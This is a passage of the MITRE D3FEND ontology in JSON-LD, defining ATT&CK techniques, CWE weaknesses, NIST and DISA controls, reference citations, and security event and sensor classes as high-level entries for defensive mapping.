        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Repository",
      "@type": "owl:Class",
      "d3f:definition": "A centralized digital storage location where code, files, and related resources are systematically organized, managed, and maintained.",
      "rdfs:isDefinedBy": {
        "@id": "https://phoenixnap.com/glossary/what-is-a-repository"
      },
      "rdfs:label": "Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:CCI-002322_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the capability to expeditiously disconnect or disable remote access to the information system within the organization-defined time period.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002322"
    },
    {
      "@id": "d3f:T1634.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1634.001",
      "d3f:definition": "Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.",
      "rdfs:label": "Keychain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1634"
      },
      "skos:prefLabel": "Keychain"
    },
    {
      "@id": "d3f:CWE-1250",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1250",
      "d3f:definition": "The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other.",
      "rdfs:label": "Improper Preservation of Consistency Between Independent Representations of Shared State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Software Updates and Patches",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-3(6)"
    },
    {
      "@id": "d3f:T1588.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.006",
      "d3f:definition": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)",
      "rdfs:label": "Vulnerabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Reference-PLX3x-Series-Multi-Protocol-Gateways",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.prosoft-technology.com/prosoft/download/9671/182665/file/PLX3x_UserManual"
      },
      "d3f:kb-abstract": "This document explains the features of the PLX3x gateway. It guides you through\nconfiguration, showing how to map data between a device or network, through the\ngateway, to a PLC or PAC. The ProSoft Configuration Builder software creates files to\nimport into the PLC or PAC programming software, integrating the gateway into your\nsystem. You can also map data between areas in the gateway's internal database. This\nallows you to copy data to different addresses within the gateway database in order to\ncreate easier data requests and control.\nThe PLX3x gateways are stand-alone DIN-rail mounted units that provide one Ethernet\nport for communications, remote configuration, and diagnostics. Your specific gateway\nmay include additional ports depending on the supported protocols. The gateway has an\nSD Card slot (SD card optional) that allows you to store configuration files that you can\nuse for recovery, transferring the configuration to another gateway, or general\nconfiguration backup.",
      "d3f:kb-organization": "ProSoft Technology",
      "d3f:kb-reference-of": {
        "@id": "d3f:OTVariableAccessRestriction"
      },
      "d3f:kb-reference-title": "PLX3x Series Multi-Protocol Gateways",
      "rdfs:label": "Reference - PLX3x Series Multi-Protocol Gateways"
    },
    {
      "@id": "d3f:CCI-001812_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prohibits user installation of software without explicit privileged status.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-01T00:00:00"
      },
      "rdfs:label": "CCI-001812"
    },
    {
      "@id": "d3f:CWE-1064",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1064",
      "d3f:definition": "The product contains a function, subroutine, or method whose signature has an unnecessarily large number of parameters/arguments.",
      "rdfs:label": "Invokable Control Element with Signature Containing an Excessive Number of Parameters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:ID3",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ID3",
      "d3f:definition": "ID3 stands for Iterative Dichotomiser 3 and is named such because the algorithm iteratively (repeatedly) dichotomizes (divides) features into two or more groups at each step.",
      "d3f:kb-article": "## Additional Considerations\nID3 is the basis of C4.5, and is best used in natural language processing.\n\n## References\nDecision Trees for Classification: ID3 Algorithm Explained. Towards Data Science. [Link](https://towardsdatascience.com/decision-trees-for-classification-id3-algorithm-explained-89df76e72df1).",
      "rdfs:label": "ID3",
      "rdfs:subClassOf": {
        "@id": "d3f:DecisionTree"
      }
    },
    {
      "@id": "d3f:Reference-ThePyramidOfPain-DavidBianco",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html"
      },
      "d3f:kb-abstract": "This article identifies progressive levels of adversary difficulty encountered for various types of indicators.",
      "d3f:kb-author": "David Bianco",
      "d3f:kb-reference-of": {
        "@id": "d3f:IdentifierActivityAnalysis"
      },
      "d3f:kb-reference-title": "The Pyramid of Pain",
      "rdfs:label": "Reference - The Pyramid of Pain - David Bianco"
    },
    {
      "@id": "d3f:CWE-624",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-624",
      "d3f:definition": "The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers.",
      "rdfs:label": "Executable Regular Expression Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-77"
      }
    },
    {
      "@id": "d3f:Reference-SiteIsolationDesignDocument",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.chromium.org/developers/design-documents/site-isolation/"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "The Chromium Projects",
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Site Isolation Design Document",
      "rdfs:label": "Reference - Site Isolation Design Document"
    },
    {
      "@id": "d3f:T1168",
      "@type": "owl:Class",
      "d3f:attack-id": "T1168",
      "d3f:definition": "On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1053",
      "rdfs:label": "Local Job Scheduling",
      "rdfs:seeAlso": {
        "@id": "d3f:T1053"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-91",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-91",
      "d3f:definition": "The product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.",
      "rdfs:label": "XML Injection (aka Blind XPath Injection)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-011%3ARegistryEditFromScreensaver",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-011/"
      },
      "d3f:kb-abstract": "Adversaries may use screensaver files to run malicious code. This analytic triggers on suspicious edits to the screensaver registry keys, which dictate which .scr file the screensaver runs.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:UserSessionInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-011: Registry Edit from Screensaver",
      "rdfs:label": "Reference - CAR-2020-11-011: Registry Edit from Screensaver"
    },
    {
      "@id": "d3f:TCPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Transmission Control Protocol (TCP), providing reliable, ordered, and error-checked delivery of data between applications.",
      "rdfs:label": "TCP Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TransportLayerEvent"
      }
    },
    {
      "@id": "d3f:ApplicationConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the parameters and initial settings for an application.",
      "rdfs:label": "Application Configuration",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/05739724-n"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Reference-UsingSpanningTreeProtocolSTPToEnhanceLayer2NetworkTopologyMaps",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8045488B2"
      },
      "d3f:kb-abstract": "Spanning Tree Protocol (STP) data is obtained via network switch (SNMP) queries to enhance identification of switch-to-switch links in Layer-2 mapping. In particular, by analyzing the STP data, ambiguity in determining switch uplink ports may be reduced. Specifically, the STP data can be used in conjunction with other topography data to provide Layer-2 connectivity for nodes on a network topology. Layer-2 address mapping tables are collected from a topology mapping, and STP data is collected, along with address translation tables (ARP) tables. Using this information, switches are identified using Layer-2 address tables. The STP data can be correlated by comparing data in switches, identifying switch ports directly connected to other switch ports, and eliminating direct switch-to-switch port connections from consideration for further Layer-2 node mappings.",
      "d3f:kb-author": "Michael Jon Swan",
      "d3f:kb-organization": "SolarWinds Worldwide LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActivePhysicalLinkMapping"
      },
      "d3f:kb-reference-title": "Using spanning tree protocol (STP) to enhance layer-2 topology maps",
      "rdfs:label": "Reference - Using spanning tree protocol (STP) to enhance layer-2 topology maps"
    },
    {
      "@id": "d3f:may-map",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-map",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1020.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1020.001",
      "d3f:definition": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)",
      "rdfs:label": "Traffic Duplication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1020"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-11_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Testing and Evaluation | Static Code Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:ApplicationHardening"
      },
      "rdfs:label": "SA-11(1)"
    },
    {
      "@id": "d3f:CWE-1335",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1335",
      "d3f:definition": "An integer value is specified to be shifted by a negative amount or an amount greater than or equal to the number of bits contained in the value causing an unexpected or indeterminate result.",
      "rdfs:label": "Incorrect Bitwise Shift of Integer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:CWE-93",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-93",
      "d3f:definition": "The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.",
      "rdfs:label": "Improper Neutralization of CRLF Sequences ('CRLF Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:Reference-CyberVaccineAndPredictiveMalwareDefensiveMethodsAndSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10848519B2/"
      },
      "d3f:kb-abstract": "Methods and systems for Predictive Malware Defense (PMD) are described. The systems and methods can utilize advanced machine-learning (ML) techniques to generate malware defenses preemptively. Embodiments of PMD can utilize models, which are trained on features extracted from malware families, to predict possible courses of malware evolution. PMD captures these predicted future evolutions in signatures of as yet unseen malware variants to function as a malware vaccine. These signatures of predicted future malware “evolutions” can be added to the training set of a machine-learning (ML) based malware detection and/or mitigation system so that it can detect these new variants as they arrive.",
      "d3f:kb-author": "Michael Howard, Avi Pfeifer, Mukesh Dalal, Michael Reposa",
      "d3f:kb-organization": "Charles River Analytics Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentAnalysis"
      },
      "d3f:kb-reference-title": "Cyber vaccine and predictive-malware-defense methods and systems",
      "rdfs:label": "Reference - Cyber vaccine and predictive-malware-defense methods and systems"
    },
    {
      "@id": "d3f:evaluated-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x evaluated-by y: The entity x is assessed and analyzed by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:evaluates"
      },
      "rdfs:label": "evaluated-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1120",
      "@type": "owl:Class",
      "d3f:attack-id": "T1120",
      "d3f:definition": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.",
      "rdfs:label": "Peripheral Device Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:EX-0013",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0013",
      "d3f:definition": "Flooding overwhelms a communication or processing path by injecting traffic at rates or patterns the system cannot comfortably absorb. In space contexts this can occur across layers: RF/optical links (continuous carriers, wideband noise, or protocol-shaped bursts); link/protocol layers (valid-looking frames at excessive cadence); application layers (command and telemetry messages that saturate parsers and queues); and internal vehicle buses where repeated messages starve critical publishers. Effects range from outright denial of service, dropped commands, lost telemetry, missed windows, to subtler corruption, such as out-of-order processing, watchdog trips, or autonomy entering protective modes due to backlogged health data. Secondary impacts include power and thermal strain as decoders, modems, or software loops spin at maximum duty, storage filling from retries, and control loops jittering when their messages are delayed. Timing matters: floods during handovers, maneuvers, or safing transitions can magnify consequences because margins are thinnest.",
      "rdfs:label": "Flooding - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Flooding"
    },
    {
      "@id": "d3f:Reference-HowDoesAntivirusQuarantineWork-SafetyDetectives",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.safetydetectives.com/blog/how-does-antivirus-quarantine-work/"
      },
      "d3f:kb-abstract": "Your antivirus has just finished a regular scan and it’s asking whether you want to quarantine the virus it’s found. You click ‘yes’ without putting much thought into what’s actually happening. But what does quarantining actually mean, what does it do and is it safe for your computer? It’s important to understand the details so that you know what’s happening when you send infected files into quarantine.",
      "d3f:kb-author": "Katarina Glamoslija",
      "d3f:kb-reference-title": "How Does Antivirus Quarantine Work?",
      "rdfs:label": "Reference - How Does Antivirus Quarantine Work? - Safety Detectives"
    },
    {
      "@id": "d3f:T1059.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.007",
      "d3f:definition": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)",
      "rdfs:label": "JavaScript",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:T1087.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.004",
      "d3f:definition": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.",
      "d3f:enumerates": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Cloud Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N056883a4ef324443af846bebde5f8ab5"
        }
      ]
    },
    {
      "@id": "_:N056883a4ef324443af846bebde5f8ab5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:OutputDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing the activity or state of output devices, including sound cards, display adapters, or media controllers. These events relate to audio, video, or graphics functionality.",
      "rdfs:label": "Output Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N8e05556262a04b499f4ee4ee60bd5525"
        }
      ]
    },
    {
      "@id": "_:N8e05556262a04b499f4ee4ee60bd5525",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutputDevice"
      }
    },
    {
      "@id": "d3f:OTDisconnectRemoteConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "The Disconnect Request message is sent to the message receiver to indicate that the transmitter is terminating its TCP socket.",
      "rdfs:label": "OT Disconnect Remote Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTConnectionCommandEvent"
        },
        {
          "@id": "_:Ne85ddf9c7ae6460db2d69d2562a56083"
        },
        {
          "@id": "_:Nbe4488f5304843328ca462dc3aa69f2d"
        }
      ]
    },
    {
      "@id": "_:Ne85ddf9c7ae6460db2d69d2562a56083",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDisconnectRemoteConnectionCommand"
      }
    },
    {
      "@id": "_:Nbe4488f5304843328ca462dc3aa69f2d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEstablishRemoteConnectionCommandEvent"
      }
    },
    {
      "@id": "d3f:SMBEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Server Message Block (SMB) protocol, a network file sharing protocol that allows client-server communication for accessing files, printers, and other shared network resources. SMB supports both transactional file operations and communication over reliable transport layers.",
      "rdfs:label": "SMB Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/smb_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:Na4dcf91dda404cf79ccbfdb54482596a"
        }
      ]
    },
    {
      "@id": "_:Na4dcf91dda404cf79ccbfdb54482596a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1562.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.001",
      "d3f:definition": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)",
      "d3f:disables": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "rdfs:label": "Disable or Modify Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Ne17396790ec94845a60f9526c5f28648"
        }
      ]
    },
    {
      "@id": "_:Ne17396790ec94845a60f9526c5f28648",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "d3f:M1034",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:IOPortRestriction"
      },
      "rdfs:label": "Limit Hardware Installation"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-3_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security Function Isolation | Hardware Separation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutionIsolation"
      },
      "rdfs:label": "SC-3(1)"
    },
    {
      "@id": "d3f:CWE-1204",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1204",
      "d3f:definition": "The product uses a cryptographic primitive that uses an Initialization Vector (IV), but the product does not generate IVs that are sufficiently unpredictable or unique according to the expected cryptographic requirements for that primitive.",
      "rdfs:label": "Generation of Weak Initialization Vector (IV)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:IsolationEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event involving actions to create logical or physical barriers that isolate compromised components, preventing adversary movement and reducing attack surfaces.",
      "d3f:related": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Isolation Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:ServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application that provides a set of software functionalities so that multiple clients can reuse the functionality, provided they are authorized for use of the service.",
      "rdfs:label": "Service Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Server_(computing)"
        },
        {
          "@id": "dbr:Service_(systems_architecture)"
        },
        {
          "@id": "https://schema.ocsf.io/objects/service"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:FileHeaderBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Headers are sections of a file that organize and provide information about specific sections or components of the file. Typically found at the beginning of a file, they often contain file type identification, version information, and metadata such as size, format, and encoding.",
      "rdfs:label": "File Header Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:T1027.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1027.002",
      "d3f:definition": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)",
      "d3f:obfuscates": {
        "@id": "d3f:ExecutableFile"
      },
      "rdfs:label": "Software Packing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1027"
        },
        {
          "@id": "_:N39c52585e9ef4280a183acb466f6091c"
        }
      ]
    },
    {
      "@id": "_:N39c52585e9ef4280a183acb466f6091c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:obfuscates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:may-deceive",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may deceive",
      "rdfs:label": "may-deceive",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:SupplyChainAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who exploits vulnerabilities in the supply chain to compromise systems or data.",
      "rdfs:label": "Supply Chain Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Attacker"
        },
        {
          "@id": "_:N8ffcd7b55fa14657bbcdc8ed8ca4e884"
        }
      ]
    },
    {
      "@id": "_:N8ffcd7b55fa14657bbcdc8ed8ca4e884",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:has-input",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-input y: An event x has input y iff y is an artifact that is present at the start of x, provides material or information required for x to begin, and during x either y's state is altered or the information content it bears is realized.",
      "owl:inverseOf": {
        "@id": "d3f:input-of"
      },
      "rdfs:domain": {
        "@id": "d3f:Event"
      },
      "rdfs:label": "has-input",
      "rdfs:range": {
        "@id": "d3f:Artifact"
      },
      "rdfs:seeAlso": [
        {
          "@id": "http://purl.obolibrary.org/obo/RO_0002233"
        },
        {
          "@id": "https://www.commoncoreontologies.org/ont00001921"
        }
      ],
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-participant"
      }
    },
    {
      "@id": "d3f:CCI-001147_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs, at a minimum, FIPS-validated cryptography to protect information when such information must be separated from individuals who have the necessary clearances yet lack the necessary access approvals.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001147"
    },
    {
      "@id": "d3f:HostConfigurationSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Collects the configuration data on an endpoint.",
      "d3f:monitors": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:OperatingSystemConfiguration"
        }
      ],
      "rdfs:label": "Host Configuration Sensor",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "_:N6fe23e18c2634394b7a93584e4331d4c"
        },
        {
          "@id": "_:N26a1d90337ad42888cabddffa879b522"
        }
      ]
    },
    {
      "@id": "_:N6fe23e18c2634394b7a93584e4331d4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "_:N26a1d90337ad42888cabddffa879b522",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfiguration"
      }
    },
    {
      "@id": "d3f:T1098.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.003",
      "d3f:definition": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)",
      "d3f:modifies": {
        "@id": "d3f:GlobalUserAccount"
      },
      "rdfs:label": "Additional Cloud Roles",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N8ca8eb1eaf0347d08609965b07f2a28a"
        }
      ]
    },
    {
      "@id": "_:N8ca8eb1eaf0347d08609965b07f2a28a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GlobalUserAccount"
      }
    },
    {
      "@id": "d3f:GNSSSatellite",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS satellite is part of a space-based constellation that transmits signals, allowing receivers on Earth to determine their position, navigation, and timing (PNT) through trilateration.",
